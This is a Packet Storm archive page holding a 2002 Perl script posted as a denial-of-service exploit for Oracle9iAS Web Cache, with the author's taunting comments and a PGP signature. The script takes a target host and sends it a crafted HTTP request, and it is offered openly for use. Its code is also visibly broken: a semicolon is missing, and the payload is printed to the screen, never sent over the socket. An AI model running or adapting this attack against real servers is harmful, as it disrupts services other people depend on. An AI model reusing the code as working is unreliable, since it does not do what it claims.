exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle9iAS.dos.pl

Oracle9iAS.dos.pl
Posted Oct 30, 2002
Authored by deadbeat

Oracle9iAS Web Cache Denial of Service exploit in perl, as described in Atstake advisory a102802-1.

tags | exploit, web, denial of service, perl
SHA-256 | b04f91f65d13ef5a37fc7fa56dcbc09b494c14e7d26b988206b52a9aaff32e39

Oracle9iAS.dos.pl

Change Mirror Download

-----BEGIN PGP SIGNED MESSAGE-----

hiya ppl,

I have made a quick script to demonstrate the Oracle DOS described in @stakes advisory:

Oracle9iAS Web Cache Denial of Service

please find the perl script pasted below.

regards:
eip/deadbeat/AnGrY_SQl

p.s. I did have about 10submissions but due to hardware failure and no backup :( I lost most my work, I will go through my h.d with a fine comb see if i can rescue some of it..there's a hell of alot more submissions to come ;)

- -----------------oracle.pl----------------
#!/usr/bin/perl

# Oracle9iAS Web Cache Denial of Service
#Coded by eip/Deadbeat/AnGrY_SQl
#haf fun script_kiddiots..

use IO::Socket;

print "\n Oracle9iAS Web Cache Denial of Service\n";
if (!$ARGV[0]){
die "Usage: perl $0 host \n";
}
$host = $ARGV[0];
print "Ok lets DOS: $host \n";
$exploit = "GET / HTTP/1.0 Host: no-one \x0a\x0d\x0a\x0d";
print $exploit
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"80",
PeerAddr=>"$host",
);
print $sox, $exploit;
print "Done..muhahaha..\n\n";
- ------------------------------------EOF-----------------

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlkEARECABkFAj2+jVESHGRlYWRiZWF0QGh1c2guY29tAAoJEEUUsIhkeIbp5koAn0Gr
aqTkPyPohdu+fRPVjCHiMO4/AJsEvRc09905wdu6kiN7Z5X4/t/f4g==
=VaJ6
-----END PGP SIGNATURE-----




Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close